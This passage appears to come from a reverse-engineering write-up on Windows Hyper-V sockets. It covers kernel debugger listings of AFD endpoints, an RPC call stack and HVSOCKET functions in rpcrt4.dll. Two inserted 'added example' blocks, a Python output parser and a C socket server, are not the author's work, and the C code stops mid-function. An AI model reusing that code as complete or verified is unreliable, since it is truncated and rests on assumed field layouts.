<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffff958f21d7eac0L 0xafd1 tcpip!UdpTlProviderMessageDispatch svchost.exe 0x438L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffff958f207dd9e0L 0xafd2 hvsocket!VmbusTlProviderEndpointDispatch powershell_ise 0x394L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffff958f1fbc5f60L 0xafd1 tcpip!UdpTlProviderMessageDispatch svchost.exe 0x498L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">---------------------------------------------------------------------------------------------</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Interestingly, we can see one more socket, created by an svchost.exe process at an early stage of operating system loading:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !py D:\ida_files\ParseAfdEndpointListHead.py</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">---------------------------------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd1851637e130L 0xafd0 tcpip!TcpTlProviderEndpointDispatch svchost.exe 0x410L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd1851627ed60L 0xafd0 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderEndpointDispatch</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> svchost.exe 0x384L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd185161d7330L 0xafd0 tcpip!TcpTlProviderEndpointDispatch wininit.exe 0x2a4L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">---------------------------------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This socket is created by the RPC service, namely by the function RPCRT4!TransportProtocol::HandlePnPStateChange. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stack:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> k – bp on wshhyperv.dll load</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 mswsock!SockGetTdiName+0x2b1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 mswsock!SockSocket+0x117</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 mswsock!WSPSocket+0x220</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 WS2_32!WSASocketW+0x1f0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 RPCRT4!TransportProtocol::OpenAddressChangeRequestSocket+0x43</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 RPCRT4!TransportProtocol::VerifyProtocolIsFunctional+0x14</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 RPCRT4!TransportProtocol::HandleProtocolChange+0x100</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a RPCRT4!TransportProtocol::HandlePnPStateChange+0x72</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b RPCRT4!ProcessNewAddressEvent+0x21</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c RPCRT4!COMMON_AddressChangeThreadPoolCallback+0x25</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d KERNELBASE!BasepTpIoCallback+0x50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e ntdll!TppIopExecuteCallback+0x118</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f ntdll!TppWorkerThread+0x8ed</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">20 KERNEL32!BaseThreadInitThunk+0x14</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21 ntdll!RtlUserThreadStart+0x21</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function ws2_32!WSAEnumProtocols is called from RPCRT4!TransportProtocol::HandlePnPStateChange, which works with rpcrt4!TransportProtocolArray based on the result of ws2_32!WSAEnumProtocols. TransportProtocol::HandleProtocolChange is called for each element of the TransportProtocol table (the second parameter is a WSAPROTOCOL_INFOW structure). The size of each TransportProtocolArray element is 72 bytes. But the type of this socket is 0xafd0. The </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">_AFD_CONNECTION</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> structure, which describes the state of such a socket, is not filled to the end, and at offset +e0 from the beginning of the structure there are only zeros. To be able to connect to Hyper-V sockets, the socket type has to be at least 0xafd2.</span></div>
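<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not the article's code or its pykd scripts), the following Python parses the output format of the two scripts shown above and applies the 0xafd2 threshold just described: it reports which provider dispatch is registered for AF_HYPERV and which processes own Hyper-V sockets, marking those that are not yet connectable. The sample lines are copied from the listings above; the field layout encoded in the AfdEndpoint regex is an assumption read from those listings.</span></div>

```python
"""Triage of the output of the two pykd scripts discussed above (added example, not the
article's code): which provider dispatch serves AF_HYPERV, and which processes own
Hyper-V sockets, checked against the article's 0xafd2 threshold for a connectable socket."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

AF_HYPERV = 0x22
MIN_CONNECTABLE_TYPE = 0xAFD2  # article: a connectable Hyper-V socket has type >= 0xafd2

# Line formats as printed in the article's listings (field layout assumed from them).
_FAMILY_RE = re.compile(r"^-{4}Address family (0x[0-9a-fA-F]+) \[ (\w+) \]")
_DISPATCH_RE = re.compile(r"^-{2}Dispatch function (\S+)")
_ENDPOINT_RE = re.compile(r"^-{4}AfdEndpoint (0x[0-9a-fA-F]+)L? (0x[0-9a-fA-F]+)"
                          r"(?: (\S+) (\S+) (0x[0-9a-fA-F]+)L?)?\s*$")

@dataclass
class AfdEndpoint:
    address: int
    type_code: int
    dispatch: str  # provider dispatch routine, or "0" when none is attached
    process: str
    pid: int

    @property
    def is_hyperv(self) -> bool:
        return self.dispatch.startswith("hvsocket!")

    @property
    def kind(self) -> str:
        for marker in ("Listen", "Message", "Endpoint"):  # from the dispatch routine name
            if marker + "Dispatch" in self.dispatch:
                return marker.lower()
        return "none"

    @property
    def connectable(self) -> bool:
        return self.type_code >= MIN_CONNECTABLE_TYPE

def parse_transport_listing(text: str) -> Dict[Tuple[int, str], List[str]]:
    """(family code, family name) -> dispatch routines registered for that family."""
    providers: Dict[Tuple[int, str], List[str]] = {}
    current: Optional[Tuple[int, str]] = None
    for line in text.splitlines():
        fam = _FAMILY_RE.match(line)
        if fam:
            current = (int(fam.group(1), 16), fam.group(2))
            providers.setdefault(current, [])
            continue
        disp = _DISPATCH_RE.match(line)
        if disp and current is not None:
            providers[current].append(disp.group(1))
    return providers

def af_hyperv_dispatch(text: str) -> List[str]:
    """Dispatch routine(s) registered for AF_HYPERV (0x22); empty if none."""
    return [d for (code, _), ds in parse_transport_listing(text).items()
            if code == AF_HYPERV for d in ds]

def parse_endpoint_listing(text: str) -> List[AfdEndpoint]:
    """Parse AfdEndpoint lines; the list head (no dispatch/process) is skipped."""
    endpoints = []
    for line in text.splitlines():
        m = _ENDPOINT_RE.match(line.strip())
        if m and m.group(3) is not None:
            endpoints.append(AfdEndpoint(int(m.group(1), 16), int(m.group(2), 16),
                                         m.group(3), m.group(4), int(m.group(5), 16)))
    return endpoints

def hyperv_sockets_by_process(text: str) -> Dict[Tuple[str, int], List[Tuple[str, int, bool]]]:
    """(process, pid) -> [(kind, type code, connectable)], Hyper-V sockets only."""
    result: Dict[Tuple[str, int], List[Tuple[str, int, bool]]] = {}
    for ep in parse_endpoint_listing(text):
        if ep.is_hyperv:
            result.setdefault((ep.process, ep.pid), []).append(
                (ep.kind, ep.type_code, ep.connectable))
    return result

# Sample input copied from the article's listings (transport list, guest OS, early boot).
TRANSPORT_LISTING = """\
----Address family 0x0 [ AF_UNSPEC ]
--Dispatch function tcpip!TcpTlProviderDispatch
----Address family 0x22 [ AF_HYPERV ]
--Dispatch function hvsocket!VmbusTlProviderDispatch
"""
GUEST_LISTING = """\
----AfdEndpoint 0xfffff80490ef74e0L 0xda10
----AfdEndpoint 0xffffd00d64e7c130L 0xafd2 tcpip!TcpTlProviderEndpointDispatch explorer.exe 0x3c0
----AfdEndpoint 0xffffd00d6421af60L 0xafd2 hvsocket!VmbusTlProviderEndpointDispatch powershell.exe 0x920
----AfdEndpoint 0xffffd00d64846ea0L 0xafd4 hvsocket!VmbusTlProviderListenDispatch powershell.exe 0x920
----AfdEndpoint 0xffffd00d640c8ba0L 0xafd4 hvsocket!VmbusTlProviderListenDispatch svchost.exe 0x35c
----AfdEndpoint 0xffffd00d650c3c30L 0xaafd 0 explorer.exe 0x3c0
"""
BOOT_LISTING = """\
----AfdEndpoint 0xffffd1851637e130L 0xafd0 tcpip!TcpTlProviderEndpointDispatch svchost.exe 0x410L
----AfdEndpoint 0xffffd1851627ed60L 0xafd0 hvsocket!VmbusTlProviderEndpointDispatch svchost.exe 0x384L
"""
```

Run on the early-boot listing, the RPC service's socket (svchost.exe 0x384) is reported as a Hyper-V endpoint of type 0xafd0 with connectable set to False, which is the condition the paragraph above describes.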
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are many functions working with Hyper-V sockets in rpcrt4.dll symbols:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_QueryClientID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_BuildAddressVector</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_Open</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_QueryClientAddress</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_REsolveAddress</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_ResolveVmId</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_ServerListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_SetSocketOption</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The purpose of adding this support to the RPC library is unknown. According to MSDN, PowerShell Direct has to work locally, and in fact it does not use RPC for its work.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="78" src="https://lh4.googleusercontent.com/6zGb91_7AH3LZkBf_aMiC_6KaYr6i3vx8AGaUH9rgXiHYfVsNK8NAwxIwYumMIc89awVkcRYT4clAJUPDh-21ibI4qHvOV2s7SrcCmyM_8QaXdiDUPxW6Dq_mhs8JX9aCOowpavhTxhumms4pQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="322" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Perhaps these functions are needed for the Docker environment, or for future support of remote operation of PowerShell Direct.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hyper-V socket work</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On MSDN only one page describes the steps needed to create an application that works with Hyper-V sockets </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. As an example, we take a simple application found on the Internet that demonstrates standard network sockets, and modify it so that it uses Hyper-V sockets for data transmission </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(https://github.com/gerhart01/HyperV-sockets</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. The application consists of a client and a server part. The client part transfers text typed in the console to the server, using Hyper-V sockets for communication.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">According to MSDN, Hyper-V sockets support the following commands: Socket, Bind, Connect, Send, Listen, Accept.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="75" src="https://lh5.googleusercontent.com/VUv7LoxkiwdAo1CKeimkzRkSmyk7kcpGQrlYzyz-Eh_RpL7kcfGdys5MFV3TQWY3xTkao-RbgQQ2o6QgAfmS2m_axqEImLUoy3mK7K9Ucu2WmiS0F4ow6kzOTURMLFCh9I28tbwnAqSM3cBT8Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="138" /></span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However, in practice it can be seen that a larger number of commands is supported:</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The server part of the application executes </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">socket, bind, listen, accept, recv, closesocket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The client part executes </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">socket, connect, send, recv, shutdown, closesocket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's look at how our application works with Hyper-V sockets. I will say at once that in general the interfaces are very similar to ordinary network sockets; only the implementation details differ. </span></div>
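<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Below, as an added example that is not code from this post or from the gerhart01/HyperV-sockets repository, is a minimal server that performs the socket, bind, listen, accept and recv sequence over AF_HYPERV. The service GUID is a constructed placeholder; the SOCKADDR_HV helper is built against portable mirror definitions of the hvsocket.h structures when compiled off Windows, so that part can be tested anywhere.</span></div>

```c
/* Added example (not code from the post or its repository): a minimal
 * Hyper-V socket server in the order the post lists for its server part
 * (socket, bind, listen, accept, recv, closesocket), plus a helper that
 * builds the SOCKADDR_HV address which bind() needs. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#include <hvsocket.h>
#pragma comment(lib, "ws2_32.lib")
#else
/* Off Windows only the address builder is compiled; these mirror the
 * Windows SDK definitions so it can be built and unit-tested anywhere. */
typedef struct { uint32_t Data1; uint16_t Data2; uint16_t Data3; uint8_t Data4[8]; } GUID;
typedef struct { uint16_t Family; uint16_t Reserved; GUID VmId; GUID ServiceId; } SOCKADDR_HV;
#define AF_HYPERV       34
#define HV_PROTOCOL_RAW 1
#endif

/* Well-known VmId from hvsocket.h (HV_GUID_CHILDREN): a listener binds to
 * it to accept connections from any child partition of this host. */
#define HV_GUID_CHILDREN_STR "90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd"

/* Constructed placeholder ServiceId. On a real host it must be registered
 * under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\
 * GuestCommunicationServices\{ServiceId} (see the MSDN page the post links
 * to), otherwise bind() fails. */
#define EXAMPLE_SERVICE_GUID "c0ffee00-0000-4000-8000-000000000001"

/* Parse "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" into a GUID.
 * Returns 0 on success, -1 on malformed input. */
static int guid_from_string(const char *s, GUID *g)
{
    unsigned int d1, d2, d3, d4[8];
    int i;
    if (strlen(s) != 36) return -1;
    if (sscanf(s, "%8x-%4x-%4x-%2x%2x-%2x%2x%2x%2x%2x%2x",
               &d1, &d2, &d3, &d4[0], &d4[1], &d4[2], &d4[3],
               &d4[4], &d4[5], &d4[6], &d4[7]) != 11)
        return -1;
    g->Data1 = d1;
    g->Data2 = (uint16_t)d2;
    g->Data3 = (uint16_t)d3;
    for (i = 0; i < 8; i++) g->Data4[i] = (uint8_t)d4[i];
    return 0;
}

/* Fill a SOCKADDR_HV: family AF_HYPERV, the VmId to listen on / connect to,
 * and the ServiceId, which plays the role a port plays for AF_INET. */
static int hv_make_sockaddr(const char *vm_guid, const char *svc_guid,
                            SOCKADDR_HV *addr)
{
    memset(addr, 0, sizeof(*addr));
    addr->Family = AF_HYPERV;
    if (guid_from_string(vm_guid, &addr->VmId) != 0) return -1;
    return guid_from_string(svc_guid, &addr->ServiceId);
}

#ifdef _WIN32
/* Accept one connection on the service and receive one message.
 * Returns the number of bytes received, or -1 on any failure. */
static int hv_server_once(const char *svc_guid)
{
    WSADATA wsa;
    SOCKADDR_HV addr, peer;
    int peer_len = sizeof(peer), n = -1;
    char buf[256];
    SOCKET ls, cs;

    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) return -1;
    if (hv_make_sockaddr(HV_GUID_CHILDREN_STR, svc_guid, &addr) != 0) goto out;

    /* Same call sequence as an AF_INET server; only the address family,
     * the protocol and the address structure differ. */
    ls = socket(AF_HYPERV, SOCK_STREAM, HV_PROTOCOL_RAW);
    if (ls == INVALID_SOCKET) goto out;
    if (bind(ls, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR ||
        listen(ls, 1) == SOCKET_ERROR) {
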